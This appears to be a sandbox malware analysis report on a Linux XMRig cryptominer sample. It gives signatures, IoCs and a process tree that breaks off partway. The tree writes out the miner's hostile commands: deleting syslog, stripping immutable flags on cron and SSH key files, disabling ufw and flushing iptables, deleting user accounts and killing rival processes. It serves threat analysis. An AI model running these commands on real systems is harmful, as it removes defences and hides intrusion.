xmrig_linux | b838a3143cb4b4c6b105b1e2ea4b72525ade567995902a2ed65cf613535615c3

Analysis

max time kernel
149s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240226-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
01-05-2024 06:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b363f246f77dd55699e7d67063c957a_JaffaCakes118
Size

28KB
MD5

0b363f246f77dd55699e7d67063c957a
SHA1

41bcbaec1ff4239bfd813d52df896b0a068bb3c4
SHA256

b838a3143cb4b4c6b105b1e2ea4b72525ade567995902a2ed65cf613535615c3
SHA512

682e50b730819a8e1749e25e12e4cdea7e2061601805e6decd86170dfc5003d64d2c078fb3d57b6f63fb524ac6b861b29f6ab89c88dbb80a27ba73d0dffeee72
SSDEEP

384:p7pQQwQHDf6jlpTWg3vMGQiKMvU/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdes:p7JVFNcD8FLcIwgiYq0xFBi5

Score

10^/10

xmrig_linux evasion miner rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 3 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
1581	ufw
1756	iptables
3121	Process not Found

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1588	modprobe

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1985	xargs
2688	Process not Found
2726	Process not Found
1602	iptables
1881	xargs
2670	Process not Found
2708	Process not Found
1809	xargs
2207	xargs
2674	Process not Found
1683	ip6tables
1710	ip6tables
1716	ip6tables
2144	xargs
2579	xargs
1617	iptables
2134	xargs
2332	xargs
2624	xargs
2722	Process not Found
2728	Process not Found
3044	Process not Found
2025	xargs
2474	xargs
1635	iptables
1698	ip6tables
1719	ip6tables
1762	chattr
1863	xargs
1950	xargs
1827	xargs
1845	xargs
2972	Process not Found
1767	grep
1887	xargs
2367	xargs
2420	xargs
2610	xargs
2284	xargs
2555	xargs
2614	xargs
2686	Process not Found
2984	Process not Found
1636	iptables
2327	xargs
2678	Process not Found
2570	xargs
3008	Process not Found
1875	xargs
2065	xargs
2095	xargs
2252	xargs
2403	xargs
2490	xargs
1579	chattr
2105	xargs
2352	xargs
2616	xargs
2648	Process not Found
2149	xargs
2702	Process not Found
3032	Process not Found
1600	iptables
1605	iptables

Disables AppArmor 47 IoCs

Disables AppArmor security module.

pid	Process
3187	Process not Found
3188	Process not Found
3099	Process not Found
3122	Process not Found
3122	Process not Found
3171	Process not Found
3180	Process not Found
3184	Process not Found
3058	Process not Found
3099	Process not Found
3166	Process not Found
3174	Process not Found
3178	Process not Found
3099	Process not Found
3122	Process not Found
3172	Process not Found
3163	Process not Found
3163	Process not Found
3182	Process not Found
3183	Process not Found
3163	Process not Found
3058	Process not Found
3095	Process not Found
3170	Process not Found
3176	Process not Found
3181	Process not Found
3058	Process not Found
3122	Process not Found
3177	Process not Found
3179	Process not Found
3163	Process not Found
3058	Process not Found
3099	Process not Found
3099	Process not Found
3122	Process not Found
3185	Process not Found
3122	Process not Found
3168	Process not Found
3163	Process not Found
3189	Process not Found
3186	Process not Found
3163	Process not Found
3058	Process not Found
3058	Process not Found
3099	Process not Found
3173	Process not Found
3175	Process not Found

Disables SELinux 1 IoCs

Disables SELinux security module.

pid	Process
3057	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
12	bitbucket.org
13	bitbucket.org
11	bitbucket.org

Changes its process name 1 IoCs

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3096

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/x_tables/initstate	modprobe
File opened for reading	/sys/module/ip6_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/956/stat	ps
File opened for reading	/proc/1438/status	ps
File opened for reading	/proc/27/status	Process not Found
File opened for reading	/proc/78/cmdline	ps
File opened for reading	/proc/self/fd	Process not Found
File opened for reading	/proc/343/cmdline	ps
File opened for reading	/proc/1560/cmdline	Process not Found
File opened for reading	/proc/1261/cmdline	Process not Found
File opened for reading	/proc/492/cmdline	Process not Found
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/1015/status	Process not Found
File opened for reading	/proc/sys/kernel/osrelease	Process not Found
File opened for reading	/proc/34/stat	ps
File opened for reading	/proc/1161/cmdline	Process not Found
File opened for reading	/proc/492/cmdline	Process not Found
File opened for reading	/proc/1153/status	ps
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/1461/cmdline	Process not Found
File opened for reading	/proc/176/status	Process not Found
File opened for reading	/proc/492/stat	ps
File opened for reading	/proc/2028/cmdline	ps
File opened for reading	/proc/207/status	ps
File opened for reading	/proc/179/status	ps
File opened for reading	/proc/522/status	Process not Found
File opened for reading	/proc/600/status	Process not Found
File opened for reading	/proc/1277/status	Process not Found
File opened for reading	/proc/34/status	ps
File opened for reading	/proc/1559/stat	ps
File opened for reading	/proc/448/stat	ps
File opened for reading	/proc/170/status	Process not Found
File opened for reading	/proc/180/status	ps
File opened for reading	/proc/1158/status	Process not Found
File opened for reading	/proc/971/status	Process not Found
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/34/stat	ps
File opened for reading	/proc/83/cmdline	ps
File opened for reading	/proc/1363/cmdline	ps
File opened for reading	/proc/1196/status	ps
File opened for reading	/proc/98/cmdline	ps
File opened for reading	/proc/971/status	Process not Found
File opened for reading	/proc/2319/cmdline	ps
File opened for reading	/proc/1346/stat	ps
File opened for reading	/proc/28/status	Process not Found
File opened for reading	/proc/98/cmdline	ps
File opened for reading	/proc/168/status	ps
File opened for reading	/proc/127/status	Process not Found
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/1040/status	Process not Found
File opened for reading	/proc/1559/cmdline	Process not Found
File opened for reading	/proc/31/status	Process not Found
File opened for reading	/proc/177/status	Process not Found
File opened for reading	/proc/177/cmdline	ps
File opened for reading	/proc/85/status	ps
File opened for reading	/proc/1171/cmdline	ps
File opened for reading	/proc/2295/status	ps
File opened for reading	/proc/1145/cmdline	pgrep
File opened for reading	/proc/458/cmdline	Process not Found
File opened for reading	/proc/11/cmdline	Process not Found
File opened for reading	/proc/674/status	ps
File opened for reading	/proc/1312/cmdline	Process not Found
File opened for reading	/proc/1129/status	Process not Found
File opened for reading	/proc/11/status	Process not Found
File opened for reading	/proc/163/cmdline	ps
File opened for reading	/proc/165/stat	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/log_rot	0b363f246f77dd55699e7d67063c957a_JaffaCakes118

/tmp/0b363f246f77dd55699e7d67063c957a_JaffaCakes118
/tmp/0b363f246f77dd55699e7d67063c957a_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1575
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1576
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:1577
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:1578
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:1579
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  PID:1580
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1581
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1585
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1586
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1587
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1588
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1600
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1602
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:1605
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:1617
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1620
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1621
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1622
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1623
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1624
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1625
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1626
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1627
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1628
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1629
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1630
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1631
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1632
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1633
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1634
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:1635
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      Attempts to change immutable files
      PID:1636
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1637
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1638
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1639
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1640
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1641
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1642
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1643
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1644
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1645
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1646
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1647
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1648
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1649
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1650
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1651
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1652
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1653
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1654
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1655
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1656
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1657
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1658
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1659
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1660
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1661
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1662
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1663
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1664
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1665
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1666
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1667
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1668
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1669
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1670
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1671
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1672
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1673
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1683
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1686
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1690
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1693
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1697
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:1698
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1701
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1703
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1706
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1707
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1708
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1709
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:1710
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1711
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1712
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1713
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1714
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1715
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      Attempts to change immutable files
      PID:1716
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1717
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1718
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1719
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1720
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1721
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1722
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1723
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1724
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1725
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1726
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1727
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1728
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1729
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1730
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1731
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1732
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1733
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1734
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1735
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1736
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1737
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1738
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1739
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1740
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1741
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1742
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1743
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1744
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1745
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1746
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1747
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1748
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1749
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1750
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1751
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1752
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1753
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1754
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1755
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1756
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:1757
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    PID:1758
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1759
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1760
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:1761
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:1762
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1763
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1764
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1765
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:1767
- /bin/ps
  ps aux
  2⤵
  PID:1766
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:1769
- /bin/ps
  ps aux
  2⤵
  PID:1768
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1774
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1773
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1772
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1779
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1778
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1777
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1776
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1785
- /bin/grep
  grep -v -
  2⤵
  PID:1784
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1783
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1782
- /bin/grep
  grep :443
  2⤵
  PID:1781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1791
- /bin/grep
  grep -v -
  2⤵
  PID:1790
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1789
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1788
- /bin/grep
  grep :23
  2⤵
  PID:1787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1797
- /bin/grep
  grep -v -
  2⤵
  PID:1796
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1795
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1794
- /bin/grep
  grep :443
  2⤵
  PID:1793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1803
- /bin/grep
  grep -v -
  2⤵
  PID:1802
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1801
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1800
- /bin/grep
  grep :143
  2⤵
  PID:1799
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1809
- /bin/grep
  grep -v -
  2⤵
  PID:1808
- /usr/bin/awk
